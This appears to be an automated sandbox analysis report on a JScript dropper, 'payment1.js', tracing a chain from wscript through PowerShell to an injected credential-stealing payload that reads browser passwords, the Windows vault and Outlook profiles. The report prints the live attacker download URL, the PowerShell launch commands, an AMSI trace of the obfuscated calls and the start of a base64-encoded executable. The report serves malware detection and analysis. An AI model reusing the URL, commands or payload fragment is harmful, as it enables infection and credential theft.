                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03841D5A10_2_03841D5A
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03847D7310_2_03847D73
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03830CB510_2_03830CB5
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384FCF210_2_0384FCF2
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03790C0010_2_03790C00
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03780CF210_2_03780CF2
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03809C3210_2_03809C32
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0306220010_2_03062200
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0305130810_2_03051308
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0305D2D010_2_0305D2D0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0305B2E010_2_0305B2E0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0305D0B010_2_0305D0B0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0305B42410_2_0305B424
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0305B43010_2_0305B430
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03063A5B10_2_03063A5B
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03063A6010_2_03063A60
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0306586010_2_03065860
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0307BEF010_2_0307BEF0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0365E3F810_2_0365E3F8
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0365E51410_2_0365E514
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0365CBC110_2_0365CBC1
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0365EA4110_2_0365EA41
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0365D97810_2_0365D978
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0365E8BA10_2_0365E8BA
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0365CC0810_2_0365CC08
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: String function: 037FEA12 appears 84 times
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: String function: 037C5130 appears 36 times
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: String function: 0380F290 appears 103 times
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: String function: 0377B970 appears 248 times
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: String function: 037D7E54 appears 85 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02BAF290 appears 103 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02B1B970 appears 250 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02B77E54 appears 88 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02B65130 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02B9EA12 appears 86 times
                Source: payment1.jsInitial sample: Strings found which are bigger than 50
                Source: Process Memory Space: powershell.exe PID: 5352, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: x.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: RegAsm.exe, 00000005.00000002.2105587672.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n_ip_tcpBS;.VBpp
                Source: RegAsm.exe, 00000005.00000002.2105587672.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BS;.VBp
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJS@14/8@6/6
                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\popo[1].ps1Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
                Source: C:\Windows\System32\wscript.exeFile created: C:\Temp\dddddd.ps1Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: MRINFO.EXE, 0000000A.00000003.2303996787.0000000003364000.00000004.00000020.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2988076296.0000000003364000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: payment1.jsVirustotal: Detection: 16%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeProcess created: C:\Windows\SysWOW64\MRINFO.EXE "C:\Windows\SysWOW64\MRINFO.EXE"
                Source: C:\Windows\SysWOW64\MRINFO.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeProcess created: C:\Windows\SysWOW64\MRINFO.EXE "C:\Windows\SysWOW64\MRINFO.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000005.00000002.2107158636.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2990258811.00000000038EE000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2990258811.0000000003750000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000003.2107338460.000000000359C000.00000004.00000020.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000003.2104477664.00000000033E4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000005.00000002.2107158636.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, MRINFO.EXE, 0000000A.00000002.2990258811.00000000038EE000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2990258811.0000000003750000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000003.2107338460.000000000359C000.00000004.00000020.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000003.2104477664.00000000033E4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mrinfo.pdbGCTL source: RegAsm.exe, 00000005.00000002.2104818275.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000002.2988989976.000000000096E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mrinfo.pdb source: RegAsm.exe, 00000005.00000002.2104818275.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000002.2988989976.000000000096E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000000.2027775593.00000000003FF000.00000002.00000001.01000000.0000000A.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2987654360.00000000003FF000.00000002.00000001.01000000.0000000A.sdmp
                Source: Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\CZDFS.pdb source: powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmp, x.exe.1.dr
                Source: Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\CZDFS.pdbBSJB source: powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmp, x.exe.1.dr

                Data Obfuscation

                barindex
                JScript performs obfuscated calls to suspicious functions
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile%2CPowerShell%20-NoProfile%20-ExecutionPolicy%20RemoteSigned%20-File%20%2CrM9SzgvYrxHPC3rZ%2CDownload%20failed%20with%20status%3A%20%2Cnte0mtu4nxrtrejRyG%2CjaK5Emo3iSkUAW%2CW4VdKZ5ZrG%2CWQ0");ITextStream.WriteLine(" entry:366 f:_0xe32f a0:292 a1:undefined");ITextStream.WriteLine(" exec:347 f:");ITextStream.WriteLine(" exit:366 f:_0xe32f r:%22MSXML2.XMLHTTP%22");ITextStream.WriteLine(" exit:307 f:_0x429836 r:%22MSXML2.XMLHTTP%22");IHost.Name();ITextStream.WriteLine(" entry:301 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:301 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:319 f:_0x165511 a0:275");ITextStream.WriteLine(" exit:319 f:_0x165511 r:%22FolderExists%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:315 o: f:FolderExists a0:%22C%3A%5CTemp%22");IFileSystem3.FolderExists("C:\Temp");IFileSystem3._00000000();ITextStream.WriteLine(" exit:315 o: f:FolderExists r:false");ITextStream.WriteLine(" entry:329 f:_0x429836 a0:287");ITextStream.WriteLine(" exec:335 f:_0xe32f");ITextStream.WriteLine(" entry:340 f:_0x3d8f");ITextStream.WriteLine(" exit:340 f:_0x3d8f r:CreateTextFile%2CPowerShell%20-NoProfile%20-ExecutionPolicy%20RemoteSigned%20-File%20%2CrM9SzgvYrxHPC3rZ%2CDownload%20failed%20with%20status%3A%20%2Cnte0mtu4nxrtrejRyG%2CjaK5Emo3iSkUAW%2CW4VdKZ5ZrG%2CWQ0");ITextStream.WriteLine(" entry:366 f:_0xe32f a0:287 a1:undefined");ITextStream.WriteLine(" exec:347 f:");ITextStream.WriteLine(" exit:366 f:_0xe32f r:%22CreateFolder%22");ITextStream.WriteLine(" exit:329 f:_0x429836 r:%22CreateFolder%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:325 o: f:CreateFolder a0:%22C%3A%5CTemp%22");IFileSystem3.CreateFolder("C:\Temp");IFileSystem3._00000000();IFolder.Path();ITextStream.WriteLine(" exit:325 o: f:CreateFolder r:C%3A%5CTemp");ITextStream.WriteLine(" entry:1289 f:DownloadScript a0:%22http%3A%2F%2F196.251.92.64%2Fcrypt%2Fpopo.ps1%22 a1:%22C%3A%5CTemp%5Cdddddd.ps1%22");ITextStream.WriteLine(" exec:371 f:DownloadScript");ITextStream.WriteLine(" entry:389 f:_0x5e2485 a0:308 a1:%22h*bh%22");ITextStream.WriteLine(" exit:389 f:_0x5e2485 r:%22Open%22");ITextStream.WriteLine(" entry:395 f:_0x5b10a7 a0:282");ITextStream.WriteLine(" exec:335 f:_0xe32f");ITextStream.WriteLine(" entry:340 f:_0x3d8f");ITextStream.WriteLine(" exit:340 f:_0x3d8f r:CreateTextFile%2CPowerShell%20-NoProfile%20-ExecutionPolicy%20RemoteSigned%20-File%20%2CrM9SzgvYrxHPC3rZ%2CDownload%20failed%20with%20status%3A%20%2Cnte0mtu4nxrtrejRyG%2CjaK5Emo3iSkUAW%2CW4VdKZ5ZrG%2CWQ0");ITextStream.WriteLine(" entry:366 f:_0xe32f a0:282 a1:undefined");ITextStream.WriteLine(" exec:347 f:");ITextStream.WriteLine(" exit:366 f:_0xe32f r:%22GET%22");ITextStream.WriteLine(" exit:395 f:_0x5b10a7 r:%22GET%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:385 o: f:Open a0:%22GET%22 a1:%22http%3A%2F
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAK
                Potential obfuscated javascript found
                Source: payment1.jsInitial file: High amount of function use 8
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8B0942 push E95B70D0h; ret 1_2_00007FFD9B8B09C9
